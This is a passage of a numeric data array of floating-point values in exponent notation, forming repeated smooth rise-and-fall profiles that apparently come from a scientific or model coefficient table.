0.86719748e-02,
0.91386139e-02,
0.94665419e-02,
0.96872011e-02,
0.98287789e-02,
0.99092564e-02,
0.99384002e-02,
0.99215917e-02,
0.98623503e-02,
0.97636050e-02,
0.96283276e-02,
0.94598122e-02,
0.92617264e-02,
0.90380237e-02,
0.87927980e-02,
0.85300365e-02,
0.82533574e-02,
0.79658525e-02,
0.76700603e-02,
0.73679010e-02,
0.70607387e-02,
0.67495992e-02,
0.64351326e-02,
0.61177979e-02,
0.57979897e-02,
0.54761712e-02,
0.51528304e-02,
0.48285746e-02,
0.45042443e-02,
0.41807955e-02,
0.38590934e-02,
0.35402139e-02,
0.32251289e-02,
0.29146906e-02,
0.26096692e-02,
0.23106080e-02,
0.20178384e-02,
0.17315357e-02,
0.14516271e-02,
0.11777402e-02,
0.90943626e-03,
0.64600032e-03,
0.38659063e-03,
0.12990853e-03,
-0.12597593e-03,
-0.38408191e-03,
-0.64947037e-03,
-0.93128323e-03,
-0.12469848e-02,
-0.16304143e-02,
-0.21464191e-02,
-0.29125693e-02,
-0.41156993e-02,
-0.59804209e-02,
-0.86140092e-02,
-0.11723425e-01,
-0.14505944e-01,
-0.16143575e-01,
-0.16627248e-01,
-0.16734317e-01,
-0.17108738e-01,
-0.17822174e-01,
-0.18725207e-01,
-0.19769130e-01,
-0.21026963e-01,
-0.22663718e-01,
-0.25009871e-01,
-0.28077208e-01,
-0.29936161e-01,
-0.29903086e-01,
0.46191481e-02,
0.52183974e-02,
0.59670168e-02,
0.67369491e-02,
0.74361749e-02,
0.80076661e-02,
0.84337806e-02,
0.87295286e-02,
0.89242216e-02,
0.90442616e-02,
0.91067078e-02,
0.91211265e-02,
0.90931328e-02,
0.90266792e-02,
0.89251632e-02,
0.87919217e-02,
0.86304275e-02,
0.84443204e-02,
0.82372911e-02,
0.80128787e-02,
0.77742967e-02,
0.75243628e-02,
0.72654327e-02,
0.69993068e-02,
0.67273136e-02,
0.64504785e-02,
0.61694812e-02,
0.58848094e-02,
0.55968449e-02,
0.53059584e-02,
0.50125136e-02,
0.47170832e-02,
0.44203578e-02,
0.41231164e-02,
0.38261772e-02,
0.35306206e-02,
0.32374398e-02,
0.29475170e-02,
0.26617502e-02,
0.23809616e-02,
0.21057320e-02,
0.18363672e-02,
0.15731406e-02,
0.13160043e-02,
0.10647054e-02,
0.81881043e-03,
0.57776505e-03,
0.34065990e-03,
0.10639309e-03,
-0.12660332e-03,
-0.36068761e-03,
-0.59937662e-03,
-0.84880623e-03,
-0.11204274e-02,
-0.14357190e-02,
-0.18365043e-02,
-0.24020236e-02,
-0.32714859e-02,
-0.46532732e-02,
-0.67663151e-02,
-0.96402615e-02,
-0.12831893e-01,
-0.15441692e-01,
-0.16770078e-01,
-0.17045652e-01,
-0.17114457e-01,
-0.17508077e-01,
-0.18213695e-01,
-0.19082699e-01,
-0.20087397e-01,
-0.21311399e-01,
-0.22931056e-01,
-0.25289452e-01,
-0.28288210e-01,
-0.29855460e-01,
-0.29540431e-01,
0.42438372e-02,
0.47970237e-02,
0.54875640e-02,
0.61967750e-02,
0.68393080e-02,
0.73622656e-02,
0.77493028e-02,
0.80144051e-02,
0.81849089e-02,
0.82855793e-02,
0.83326427e-02,
0.83354777e-02,
0.82998471e-02,
0.82299737e-02,
0.81294924e-02,
0.80018509e-02,
0.78504579e-02,
0.76786745e-02,
0.74897227e-02,
0.72865360e-02,
0.70716739e-02,
0.68472759e-02,
0.66150147e-02,
0.63761803e-02,
0.61317808e-02,
0.58825328e-02,
0.56289569e-02,
0.53714588e-02,
0.51103933e-02,
0.48460537e-02,
0.45788516e-02,
0.43093446e-02,
0.40383078e-02,
0.37663926e-02,
0.34944667e-02,
0.32235801e-02,
0.29546390e-02,
0.26885115e-02,
0.24261076e-02,
0.21682207e-02,
0.19154118e-02,
0.16681626e-02,
0.14266440e-02,
0.11909056e-02,
0.96084451e-03,
0.73608221e-03,
0.51601185e-03,
0.29983022e-03,
0.86455977e-04,
-0.12548176e-03,
-0.33780126e-03,
-0.55322744e-03,
-0.77611348e-03,
-0.10140111e-02,
-0.12810014e-02,
-0.16041107e-02,
-0.20356334e-02,
-0.26726879e-02,
-0.36793316e-02,
-0.52829208e-02,
-0.76788506e-02,
-0.10785309e-01,
-0.13992673e-01,
-0.16345447e-01,
-0.17329855e-01,
-0.17411666e-01,
-0.17451219e-01,
-0.17846853e-01,
-0.18514944e-01,
-0.19316018e-01,
-0.20241588e-01,
-0.21382602e-01,
-0.22925586e-01,
-0.25219092e-01,
-0.28025590e-01,
-0.29143283e-01,
-0.28364539e-01,
0.38802244e-02,
0.43883347e-02,
0.50221425e-02,
0.56721950e-02,
0.62597329e-02,
0.67359642e-02,
0.70858784e-02,
0.73225168e-02,
0.74713244e-02,
0.75554666e-02,
0.75903148e-02,
0.75849718e-02,
0.75452076e-02,
0.74753161e-02,
0.73789642e-02,
0.72595305e-02,
0.71201995e-02,
0.69639226e-02,
0.67933705e-02,
0.66109342e-02,
0.64186375e-02,
0.62180408e-02,
0.60103335e-02,
0.57964721e-02,
0.55771875e-02,
0.53530186e-02,
0.51244237e-02,
0.48917811e-02,
0.46553644e-02,
0.44155009e-02,
0.41726306e-02,
0.39273482e-02,
0.36802413e-02,
0.34321158e-02,
0.31838417e-02,
0.29362249e-02,
0.26901832e-02,
0.24466240e-02,
0.22063667e-02,
0.19700988e-02,
0.17385191e-02,
0.15121014e-02,
0.12910479e-02,
0.10755060e-02,
0.86542196e-03,
0.66050846e-03,
0.46016547e-03,
0.26359106e-03,
0.69742789e-04,
-0.12264148e-03,
-0.31505234e-03,
-0.50968054e-03,
-0.70983008e-03,
-0.92059938e-03,
-0.11514680e-02,
-0.14202188e-02,
-0.17611791e-02,
-0.22402222e-02,
-0.29767312e-02,
-0.41622054e-02,
-0.60354555e-02,
-0.87412195e-02,
-0.12048509e-01,
-0.15178418e-01,
-0.17183300e-01,
-0.17799482e-01,
-0.17704254e-01,
-0.17711623e-01,
-0.18075820e-01,
-0.18659104e-01,
-0.19336520e-01,
-0.20114373e-01,
-0.21086661e-01,
-0.22448380e-01,
-0.24543686e-01,
-0.26968870e-01,
-0.27425798e-01,
-0.25982859e-01,
0.35297391e-02,
0.39938814e-02,
0.45724809e-02,
0.51651788e-02,
0.56997212e-02,
0.61313836e-02,
0.64464915e-02,
0.66571729e-02,
0.67870081e-02,
0.68575540e-02,
0.68832617e-02,
0.68728351e-02,
0.68318904e-02,
0.67646406e-02,
0.66746362e-02,
0.65650316e-02,
0.64386618e-02,
0.62980657e-02,
0.61454801e-02,
0.59827766e-02,
0.58114552e-02,
0.56327097e-02,
0.54474538e-02,
0.52563460e-02,
0.50598914e-02,
0.48585772e-02,
0.46528103e-02,
0.44429065e-02,
0.42291693e-02,
0.40119542e-02,
0.37917392e-02,
0.35690265e-02,
0.33443815e-02,
0.31186463e-02,
0.28926407e-02,
0.26670455e-02,
0.24426919e-02,
0.22205103e-02,
0.20012076e-02,
0.17854705e-02,
0.15739684e-02,
0.13671899e-02,
0.11654871e-02,
0.96899009e-03,
0.77774836e-03,
0.59148681e-03,
0.40965760e-03,
0.23145005e-03,
0.55848002e-04,
-0.11826525e-03,
-0.29229349e-03,
-0.46810537e-03,
-0.64812414e-03,
-0.83613564e-03,
-0.10385482e-02,
-0.12673559e-02,
-0.15453240e-02,
-0.19167364e-02,
-0.24653263e-02,
-0.33373679e-02,
-0.47518569e-02,
-0.69443211e-02,
-0.99710366e-02,
-0.13414696e-01,
-0.16345950e-01,
-0.17911386e-01,
-0.18145934e-01,
-0.17885052e-01,
-0.17836532e-01,
-0.18110715e-01,
-0.18532671e-01,
-0.18993681e-01,
-0.19508589e-01,
-0.20170461e-01,
-0.21185948e-01,
-0.22894341e-01,
-0.24724348e-01,
-0.24370475e-01,
-0.22268195e-01,
0.31942856e-02,
0.36158317e-02,
0.41410751e-02,
0.46785669e-02,
0.51624421e-02,
0.55519687e-02,
0.58347746e-02,
0.60220673e-02,
0.61355513e-02,
0.61951405e-02,
0.62143006e-02,
0.62012500e-02,
0.61613480e-02,
0.60985861e-02,
0.60162526e-02,
0.59171882e-02,
0.58038891e-02,
0.56785326e-02,
0.55429381e-02,
0.53985524e-02,
0.52465028e-02,
0.50876997e-02,
0.49228426e-02,
0.47523943e-02,
0.45767589e-02,
0.43963231e-02,
0.42114421e-02,
0.40224311e-02,
0.38296313e-02,
0.36334537e-02,
0.34343314e-02,
0.32326737e-02,
0.30291770e-02,
0.28245456e-02,
0.26194807e-02,
0.24146992e-02,
0.22109461e-02,
0.20089839e-02,
0.18095284e-02,
0.16132607e-02,
0.14207716e-02,
0.12325735e-02,
0.10491284e-02,
0.87066717e-03,
0.69715641e-03,
0.52842626e-03,
0.36394782e-03,
0.20294097e-03,
0.44450713e-04,
-0.11262445e-03,
-0.26963896e-03,
-0.42814302e-03,
-0.59004046e-03,
-0.75823971e-03,
-0.93725865e-03,
-0.11351963e-02,
-0.13674999e-02,
-0.16641312e-02,
-0.20829688e-02,
-0.27305069e-02,
-0.37841904e-02,
-0.54863039e-02,
-0.80432529e-02,
-0.11373957e-01,
-0.14846842e-01,
-0.17431933e-01,
-0.18471425e-01,
-0.18317387e-01,
-0.17884307e-01,
-0.17721877e-01,
-0.17807389e-01,
-0.17944368e-01,
-0.18038927e-01,
-0.18111341e-01,
-0.18263325e-01,
-0.18744303e-01,
-0.19931488e-01,
-0.21152221e-01,
-0.20258194e-01,
-0.18154927e-01,
0.28755944e-02,
0.32562227e-02,
0.37303183e-02,
0.42150859e-02,
0.46508745e-02,
0.50008302e-02,
0.52538323e-02,
0.54201568e-02,
0.55196281e-02,
0.55704820e-02,
0.55851364e-02,
0.55712480e-02,
0.55338335e-02,
0.54765893e-02,
0.54024858e-02,
0.53140409e-02,
0.52134213e-02,
0.51024402e-02,
0.49825548e-02,
0.48549226e-02,
0.47204504e-02,
0.45797881e-02,
0.44334051e-02,
0.42817341e-02,
0.41251029e-02,
0.39637811e-02,
0.37980722e-02,
0.36283240e-02,
0.34549329e-02,
0.32783179e-02,
0.30987991e-02,
0.29169142e-02,
0.27332988e-02,
0.25485274e-02,
0.23631887e-02,
0.21780862e-02,
0.19938366e-02,
0.18110086e-02,
0.16303621e-02,
0.14525431e-02,
0.12780537e-02,
0.11074701e-02,
0.94128802e-03,
0.77982916e-03,
0.62306761e-03,
0.47078525e-03,
0.32257999e-03,
0.17765176e-03,
0.35159428e-04,
-0.10600228e-03,
-0.24719909e-03,
-0.38967439e-03,
-0.53508411e-03,
-0.68561384e-03,
-0.84459153e-03,
-0.10175847e-02,
-0.12152690e-02,
-0.14582346e-02,
-0.17864328e-02,
-0.22758693e-02,
-0.30617819e-02,
-0.43552169e-02,
-0.64090681e-02,
-0.93599092e-02,
-0.12933343e-01,
-0.16276378e-01,
-0.18346461e-01,
-0.18781584e-01,
-0.18226096e-01,
-0.17576260e-01,
-0.17187940e-01,
-0.16925601e-01,
-0.16586989e-01,
-0.16100395e-01,
-0.15514784e-01,
-0.15000328e-01,
-0.14952605e-01,
-0.15897794e-01,
-0.17156484e-01,
-0.16811144e-01,
-0.16059641e-01,
0.25749404e-02,
0.29165992e-02,
0.33420587e-02,
0.37768418e-02,
0.41672788e-02,
0.44802395e-02,
0.47057904e-02,
0.48532858e-02,
0.49406979e-02,
0.49845842e-02,
0.49962578e-02,
0.49827271e-02,
0.49485951e-02,
0.48972480e-02,
0.48313839e-02,
0.47532097e-02,
0.46645310e-02,
0.45668236e-02,
0.44612922e-02,
0.43488974e-02,
0.42303428e-02,
0.41060960e-02,
0.39765178e-02,
0.38419361e-02,
0.37026398e-02,
0.35588457e-02,
0.34108032e-02,
0.32588942e-02,
0.31035459e-02,
0.29450748e-02,
0.27838917e-02,
0.26205610e-02,
0.24555970e-02,
0.22894754e-02,
0.21228124e-02,
0.19562438e-02,
0.17903824e-02,
0.16257121e-02,
0.14628675e-02,
0.13024764e-02,
0.11450466e-02,
0.99116936e-03,
0.84134901e-03,
0.69589523e-03,
0.55489980e-03,
0.41809730e-03,
0.28507152e-03,
0.15523843e-03,
0.27696389e-04,
-0.98706871e-04,
-0.22511023e-03,
-0.35272306e-03,
-0.48294108e-03,
-0.61748014e-03,
-0.75878931e-03,
-0.91083115e-03,
-0.10810896e-02,
-0.12839842e-02,
-0.15473457e-02,
-0.19251802e-02,
-0.25176301e-02,
-0.34943304e-02,
-0.50974879e-02,
-0.75646825e-02,
-0.10904021e-01,
-0.14594574e-01,
-0.17590806e-01,
-0.18962247e-01,
-0.18717308e-01,
-0.17718159e-01,
-0.16742069e-01,
-0.15938997e-01,
-0.15096456e-01,
-0.14041902e-01,
-0.12778138e-01,
-0.11481387e-01,
-0.10537255e-01,
-0.10632942e-01,
-0.12457354e-01,
-0.15134930e-01,
-0.16634356e-01,
-0.17927606e-01,
0.22929932e-02,
0.25978240e-02,
0.29773721e-02,
0.33650806e-02,
0.37129789e-02,
0.39914814e-02,
0.41917670e-02,
0.43222816e-02,
0.43991888e-02,
0.44373926e-02,
0.44470965e-02,
0.44346289e-02,
0.44041476e-02,
0.43587163e-02,
0.43007480e-02,
0.42321626e-02,
0.41544731e-02,
0.40688911e-02,
0.39764121e-02,
0.38778088e-02,
0.37736101e-02,
0.36642191e-02,
0.35499295e-02,
0.34309430e-02,
0.33074785e-02,
0.31797730e-02,
0.30480758e-02,
0.29127430e-02,
0.27741243e-02,
0.26325521e-02,
0.24885421e-02,
0.23425936e-02,
0.21950973e-02,
0.20465283e-02,
0.18974531e-02,
0.17483715e-02,
0.15998175e-02,
0.14523078e-02,
0.13063080e-02,
0.11623653e-02,
0.10211229e-02,
0.88305573e-03,
0.74868003e-03,
0.61835541e-03,
0.49214705e-03,
0.36987942e-03,
0.25109114e-03,
0.13533220e-03,
0.21703247e-04,
-0.90926857e-04,
-0.20352546e-03,
-0.31733362e-03,
-0.43350609e-03,
-0.55338885e-03,
-0.67877601e-03,
-0.81268302e-03,
-0.96038845e-03,
-0.11320858e-02,
-0.13475646e-02,
-0.16453972e-02,
-0.20989443e-02,
-0.28392603e-02,
-0.40741763e-02,
-0.60647582e-02,
-0.89876316e-02,
-0.12647802e-01,
-0.16243244e-01,
-0.18616004e-01,
-0.19093577e-01,
-0.18077876e-01,
-0.16530357e-01,
-0.15029374e-01,
-0.13550565e-01,
-0.11885053e-01,
-0.99943755e-02,
-0.81011895e-02,
-0.66745249e-02,
-0.64049885e-02,
-0.81325630e-02,
-0.12245839e-01,
-0.17089149e-01,
-0.20167973e-01,
-0.22245478e-01,
0.20299123e-02,
0.23001628e-02,
0.26366366e-02,
0.29802567e-02,
0.32884392e-02,
0.35349382e-02,
0.37119628e-02,
0.38270687e-02,
0.38946737e-02,
0.39280793e-02,
0.39364123e-02,
0.39253496e-02,
0.38986101e-02,
0.38588869e-02,
0.38082711e-02,
0.37484372e-02,
0.36807158e-02,
0.36061385e-02,
0.35254795e-02,
0.34393084e-02,
0.33480865e-02,
0.32521591e-02,
0.31517555e-02,
0.30470104e-02,
0.29380592e-02,
0.28251486e-02,
0.27085962e-02,
0.25886497e-02,
0.24655664e-02,
0.23397931e-02,
0.22118504e-02,
0.20821332e-02,
0.19509925e-02,
0.18189276e-02,
0.16863818e-02,
0.15537632e-02,
0.14214842e-02,
0.12901434e-02,
0.11600459e-02,
0.10316600e-02,
0.90566400e-03,
0.78258343e-03,
0.66282053e-03,
0.54670696e-03,
0.43438902e-03,
0.32569954e-03,
0.22029619e-03,
0.11765160e-03,
0.16918209e-04,
-0.82841863e-04,
-0.18264857e-03,
-0.28356965e-03,
-0.38668749e-03,
-0.49303711e-03,
-0.60395780e-03,
-0.72176283e-03,
-0.85029344e-03,
-0.99679129e-03,
-0.11756377e-02,
-0.14147292e-02,
-0.17678216e-02,
-0.23343621e-02,
-0.32830362e-02,
-0.48576673e-02,
-0.73089227e-02,
-0.10680980e-01,
-0.14495158e-01,
-0.17674342e-01,
-0.19089572e-01,
-0.18462013e-01,
-0.16541397e-01,
-0.14258571e-01,
-0.11979854e-01,
-0.96273897e-02,
-0.71729873e-02,
-0.49013551e-02,
-0.33841925e-02,
-0.33057944e-02,
-0.52674399e-02,
-0.96266540e-02,
-0.15894135e-01,
-0.21601008e-01,
-0.24401912e-01,
-0.25605565e-01,
0.17854190e-02,
0.20233756e-02,
0.23196433e-02,
0.26221615e-02,
0.28933994e-02,
0.31102363e-02,
0.32658295e-02,
0.33668731e-02,
0.34261208e-02,
0.34553525e-02,
0.34626699e-02,
0.34531134e-02,
0.34299616e-02,
0.33955548e-02,
0.33516849e-02,
0.32997937e-02,
0.32410624e-02,
0.31763858e-02,
0.31063606e-02,
0.30314266e-02,
0.29519610e-02,
0.28682463e-02,
0.27804545e-02,
0.26887048e-02,
0.25930938e-02,
0.24938518e-02,
0.23912911e-02,
0.22855958e-02,
0.21769952e-02,
0.20659990e-02,
0.19530528e-02,
0.18384572e-02,
0.17226556e-02,
0.16060474e-02,
0.14889956e-02,
0.13717994e-02,
0.12548816e-02,
0.11386774e-02,
0.10235143e-02,
0.90985751e-03,
0.79824886e-03,
0.68927044e-03,
0.58327196e-03,
0.48052520e-03,
0.38123387e-03,
0.28524606e-03,
0.19232801e-03,
0.10188403e-03,
0.13148935e-04,
-0.74649892e-04,
-0.16256304e-03,
-0.25152223e-03,
-0.34248683e-03,
-0.43625894e-03,
-0.53394295e-03,
-0.63723064e-03,
-0.74901024e-03,
-0.87452604e-03,
-0.10243639e-02,
-0.12190320e-02,
-0.14982653e-02,
-0.19371029e-02,
-0.26686641e-02,
-0.39032472e-02,
-0.59056627e-02,
-0.88597359e-02,
-0.12578117e-01,
-0.16234819e-01,
-0.18552493e-01,
-0.18625131e-01,
-0.16659645e-01,
-0.13658211e-01,
-0.10453119e-01,
-0.73239915e-02,
-0.43831225e-02,
-0.19895632e-02,
-0.75665663e-03,
-0.12641177e-02,
-0.37606840e-02,
-0.81160162e-02,
-0.14009449e-01,
-0.20516826e-01,
-0.25252979e-01,
-0.26749684e-01,
-0.26949666e-01,
0.15589494e-02,
0.17668876e-02,
0.20257886e-02,
0.22901346e-02,
0.25271075e-02,
0.27164973e-02,
0.28523379e-02,
0.29405085e-02,
0.29921937e-02,
0.30177287e-02,
0.30242268e-02,
0.30161096e-02,
0.29962433e-02,
0.29666633e-02,
0.29289203e-02,
0.28842422e-02,
0.28336111e-02,
0.27777818e-02,
0.27172987e-02,
0.26525310e-02,
0.25837307e-02,
0.25110987e-02,
0.24347827e-02,
0.23548861e-02,
0.22715516e-02,
0.21849549e-02,
0.20953005e-02,
0.20027831e-02,
0.19077143e-02,
0.18105077e-02,
0.17114856e-02,
0.16110209e-02,
0.15095366e-02,
0.14073697e-02,
0.13047857e-02,
0.12020444e-02,
0.10995269e-02,
0.99746429e-03,
0.89634967e-03,
0.79651998e-03,
0.69846597e-03,
0.60272694e-03,
0.50964806e-03,
0.41947985e-03,
0.33230876e-03,
0.24821598e-03,
0.16693448e-03,
0.87793873e-04,
0.10210203e-04,
-0.66529035e-04,
-0.14337612e-03,
-0.22124445e-03,
-0.30088221e-03,
-0.38298120e-03,
-0.46846602e-03,
-0.55856747e-03,
-0.65543054e-03,
-0.76301250e-03,
-0.88915287e-03,
-0.10492229e-02,
-0.12729177e-02,
-0.16169698e-02,
-0.21851282e-02,
-0.31512871e-02,
-0.47627124e-02,
-0.72655436e-02,
-0.10682470e-01,
-0.14481976e-01,
-0.17479382e-01,
-0.18369909e-01,
-0.16695704e-01,
-0.13192192e-01,
-0.90477718e-02,
-0.50837407e-02,
-0.17456600e-02,
0.50775765e-03,
0.11405456e-02,
-0.15771549e-03,
-0.32012013e-02,
-0.74220751e-02,
-0.12348277e-01,
-0.17880509e-01,
-0.23407269e-01,
-0.26902754e-01,
-0.27527036e-01,
-0.27351677e-01,
0.13498098e-02,
0.15299571e-02,
0.17542662e-02,
0.19832880e-02,
0.21885794e-02,
0.23526303e-02,
0.24702842e-02,
0.25466559e-02,
0.25914581e-02,
0.26136602e-02,
0.26194309e-02,
0.26126066e-02,
0.25956824e-02,
0.25704356e-02,
0.25382130e-02,
0.25000437e-02,
0.24567009e-02,
0.24088090e-02,
0.23568932e-02,
0.23012925e-02,
0.22421621e-02,
0.21796003e-02,
0.21137316e-02,
0.20446836e-02,
0.19726283e-02,
0.18976876e-02,
0.18199275e-02,
0.17396152e-02,
0.16571450e-02,
0.15727388e-02,
0.14866672e-02,
0.13993700e-02,
0.13112020e-02,
0.12224860e-02,
0.11333575e-02,
0.10441266e-02,
0.95500512e-03,
0.86619117e-03,
0.77818817e-03,
0.69130980e-03,
0.60596765e-03,
0.52263023e-03,
0.44163744e-03,
0.36320378e-03,
0.28736555e-03,
0.21433813e-03,
0.14382407e-03,
0.75184740e-04,
0.79467936e-05,
-0.58581456e-04,
-0.12522114e-03,
-0.19278513e-03,
-0.26187330e-03,
-0.33317646e-03,
-0.40739289e-03,
-0.48542794e-03,
-0.56885718e-03,
-0.66080934e-03,
-0.76709641e-03,
-0.89942804e-03,
-0.10802879e-02,
-0.13528165e-02,
-0.17975677e-02,
-0.25551619e-02,
-0.38419224e-02,
-0.59169503e-02,
-0.89288345e-02,
-0.12605214e-01,
-0.15980633e-01,
-0.17610485e-01,
-0.16458714e-01,
-0.12757922e-01,
-0.78148004e-02,
-0.30447829e-02,
0.58803929e-03,
0.24830827e-02,
0.23169408e-02,
0.21695795e-03,
-0.31757678e-02,
-0.70471163e-02,
-0.10940184e-01,
-0.15055859e-01,
-0.19874115e-01,
-0.24761699e-01,
-0.27603908e-01,
-0.27851652e-01,
-0.27539870e-01,
0.11573090e-02,
0.13118297e-02,
0.15042420e-02,
0.17007013e-02,
0.18768052e-02,
0.20175355e-02,
0.21184757e-02,
0.21840241e-02,
0.22225198e-02,
0.22416625e-02,
0.22467452e-02,
0.22410604e-02,
0.22267597e-02,
0.22053893e-02,
0.21781034e-02,
0.21457481e-02,
0.21089534e-02,
0.20682334e-02,
0.20240291e-02,
0.19766658e-02,
0.19262728e-02,
0.18728701e-02,
0.18165240e-02,
0.17574138e-02,
0.16956952e-02,
0.16314362e-02,
0.15646521e-02,
0.14956590e-02,
0.14248277e-02,
0.13522609e-02,
0.12782239e-02,
0.12031234e-02,
0.11273304e-02,
0.10510463e-02,
0.97442413e-03,
0.89773658e-03,
0.82104641e-03,
0.74460293e-03,
0.66874258e-03,
0.59397513e-03,
0.52050536e-03,
0.44870362e-03,
0.37896109e-03,
0.31140892e-03,
0.24619559e-03,
0.18341106e-03,
0.12278830e-03,
0.63891501e-04,
0.61988922e-05,
-0.50909595e-04,
-0.10814507e-03,
-0.16616660e-03,
-0.22550514e-03,
-0.28680690e-03,
-0.35062019e-03,
-0.41758217e-03,
-0.48887444e-03,
-0.56698389e-03,
-0.65631996e-03,
-0.76583039e-03,
-0.91279822e-03,
-0.11302640e-02,
-0.14807846e-02,
-0.20767434e-02,
-0.31004245e-02,
-0.47965096e-02,
-0.73740366e-02,
-0.10751202e-01,
-0.14214644e-01,
-0.16375747e-01,
-0.15823588e-01,
-0.12226088e-01,
-0.67599509e-02,
-0.13356704e-02,
0.24713113e-02,
0.38747264e-02,
0.28679580e-02,
0.11903104e-03,
-0.33430753e-02,
-0.66695027e-02,
-0.96058799e-02,
-0.12532249e-01,
-0.16198792e-01,
-0.21001449e-01,
-0.25733067e-01,
-0.28118331e-01,
-0.27977712e-01,
-0.27381005e-01,
0.98083925e-03,
0.11118341e-02,
0.12749631e-02,
0.14415317e-02,
0.15908498e-02,
0.17101859e-02,
0.17957988e-02,
0.18514196e-02,
0.18841210e-02,
0.19004331e-02,
0.19048484e-02,
0.19001653e-02,
0.18882133e-02,
0.18703013e-02,
0.18473966e-02,
0.18202132e-02,
0.17892951e-02,
0.17550559e-02,
0.17178158e-02,
0.16778519e-02,
0.16353233e-02,
0.15902224e-02,
0.15425772e-02,
0.14925570e-02,
0.14402777e-02,
0.13857534e-02,
0.13290886e-02,
0.12705566e-02,
0.12104037e-02,
0.11487597e-02,
0.10858473e-02,
0.10220249e-02,
0.95764559e-03,
0.89280307e-03,
0.82777342e-03,
0.76263881e-03,
0.69743692e-03,
0.63244364e-03,
0.56787435e-03,
0.50428713e-03,
0.44183279e-03,
0.38074178e-03,
0.32141685e-03,
0.26393912e-03,
0.20854473e-03,
0.15521001e-03,
0.10369664e-03,
0.53771990e-04,
0.48405859e-05,
-0.43625452e-04,
-0.92199283e-04,
-0.14142317e-03,
-0.19180843e-03,
-0.24387297e-03,
-0.29810442e-03,
-0.35491036e-03,
-0.41522519e-03,
-0.48093690e-03,
-0.55558363e-03,
-0.64595538e-03,
-0.76544558e-03,
-0.93956996e-03,
-0.12170107e-02,
-0.16869402e-02,
-0.24994221e-02,
-0.38717622e-02,
-0.60297726e-02,
-0.90123136e-02,
-0.12333807e-01,
-0.14771741e-01,
-0.14760138e-01,
-0.11492035e-01,
-0.58502830e-02,
-0.39222432e-04,
0.38003121e-02,
0.46805777e-02,
0.29477894e-02,
-0.19698367e-03,
-0.34707133e-02,
-0.61565377e-02,
-0.82763545e-02,
-0.10341127e-01,
-0.13046334e-01,
-0.17025929e-01,
-0.22158746e-01,
-0.26648698e-01,
-0.28339002e-01,
-0.27549669e-01,
-0.26395839e-01,
0.81985246e-03,
0.92936639e-03,
0.10657535e-02,
0.12050235e-02,
0.13298774e-02,
0.14296711e-02,
0.15012774e-02,
0.15478174e-02,
0.15752059e-02,
0.15889057e-02,
0.15926794e-02,
0.15888754e-02,
0.15790189e-02,
0.15641790e-02,
0.15451561e-02,
0.15225782e-02,
0.14969195e-02,
0.14685052e-02,
0.14375511e-02,
0.14042476e-02,
0.13687719e-02,
0.13311717e-02,
0.12914606e-02,
0.12497153e-02,
0.12060066e-02,
0.11603512e-02,
0.11129703e-02,
0.10640363e-02,
0.10136392e-02,
0.96200767e-03,
0.90932270e-03,
0.85588358e-03,
0.80193224e-03,
0.74761838e-03,
0.69321913e-03,
0.63866674e-03,
0.58403739e-03,
0.52954548e-03,
0.47544795e-03,
0.42208337e-03,
0.36977371e-03,
0.31858659e-03,
0.26881197e-03,
0.22063967e-03,
0.17424425e-03,
0.12957763e-03,
0.86436587e-04,
0.44699889e-04,
0.37974135e-05,
-0.36786892e-04,
-0.77447279e-04,
-0.11859972e-03,
-0.16077398e-03,
-0.20438076e-03,
-0.24981576e-03,
-0.29733716e-03,
-0.34771886e-03,
-0.40232454e-03,
-0.46408881e-03,
-0.53816853e-03,
-0.63491607e-03,
-0.77419216e-03,
-0.99393132e-03,
-0.13644308e-02,
-0.20072565e-02,
-0.31077981e-02,
-0.48824749e-02,
-0.74348073e-02,
-0.10457132e-01,
-0.12935034e-01,
-0.13322859e-01,
-0.10510216e-01,
-0.50372370e-02,
0.82519592e-03,
0.45412472e-02,
0.49564531e-02,
0.27259453e-02,
-0.53395459e-03,
-0.34414190e-02,
-0.54976437e-02,
-0.69722342e-02,
-0.84393835e-02,
-0.10464143e-01,
-0.13568074e-01,
-0.18088147e-01,
-0.23360549e-01,
-0.27191006e-01,
-0.27798105e-01,
-0.26014257e-01,
-0.23941122e-01,
0.67388569e-03,
0.76391455e-03,
0.87603967e-03,
0.99053816e-03,
0.10931880e-02,
0.11752385e-02,
0.12341201e-02,
0.12724005e-02,
0.12949465e-02,
0.13062552e-02,
0.13094257e-02,
0.13063867e-02,
0.12983767e-02,
0.12862559e-02,
0.12706857e-02,
0.12522101e-02,
0.12312382e-02,
0.12080271e-02,
0.11827156e-02,
0.11554065e-02,
0.11262480e-02,
0.10953922e-02,
0.10628636e-02,
0.10286153e-02,
0.99264085e-03,
0.95504802e-03,
0.91611175e-03,
0.87590015e-03,
0.83438883e-03,
0.79185999e-03,
0.74851344e-03,
0.70453959e-03,
0.66006870e-03,
0.61538786e-03,
0.57062833e-03,
0.52572385e-03,
0.48075779e-03,
0.43583699e-03,
0.39130700e-03,
0.34728937e-03,
0.30423937e-03,
0.26211512e-03,
0.22102211e-03,
0.18136523e-03,
0.14320243e-03,
0.10641267e-03,
0.70891205e-04,
0.36568774e-04,
0.29850753e-05,
-0.30428575e-04,
-0.63911211e-04,
-0.97726115e-04,
-0.13241505e-03,
-0.16834371e-03,
-0.20574214e-03,
-0.24483376e-03,
-0.28623073e-03,
-0.33093616e-03,
-0.38131754e-03,
-0.44136596e-03,
-0.51900127e-03,
-0.62973931e-03,
-0.80306787e-03,
-0.10939565e-02,
-0.15995824e-02,
-0.24733264e-02,
-0.39081872e-02,
-0.60330946e-02,
-0.86653326e-02,
-0.10997782e-01,
-0.11619342e-01,
-0.93000261e-02,
-0.42796796e-02,
0.12966705e-02,
0.47367909e-02,
0.48012077e-02,
0.23494719e-02,
-0.77558518e-03,
-0.32301398e-02,
-0.47397721e-02,
-0.57379329e-02,
-0.67931442e-02,
-0.83390176e-02,
-0.10730988e-01,
-0.14351542e-01,
-0.19255424e-01,
-0.24215246e-01,
-0.26824960e-01,
-0.25858946e-01,
-0.22609137e-01,
-0.19117815e-01,
0.54258847e-03,
0.61508559e-03,
0.70537691e-03,
0.79757918e-03,
0.88023918e-03,
0.94631047e-03,
0.99372561e-03,
0.10245563e-02,
0.10427287e-02,
0.10518713e-02,
0.10544811e-02,
0.10520979e-02,
0.10457006e-02,
0.10359808e-02,
0.10234818e-02,
0.10086508e-02,
0.99183375e-03,
0.97323948e-03,
0.95295400e-03,
0.93100907e-03,
0.90750493e-03,
0.88267523e-03,
0.85658359e-03,
0.82906929e-03,
0.80003683e-03,
0.76972524e-03,
0.73839410e-03,
0.70602290e-03,
0.67255105e-03,
0.63823280e-03,
0.60333178e-03,
0.56789321e-03,
0.53199811e-03,
0.49601536e-03,
0.45993822e-03,
0.42375299e-03,
0.38750842e-03,
0.35126708e-03,
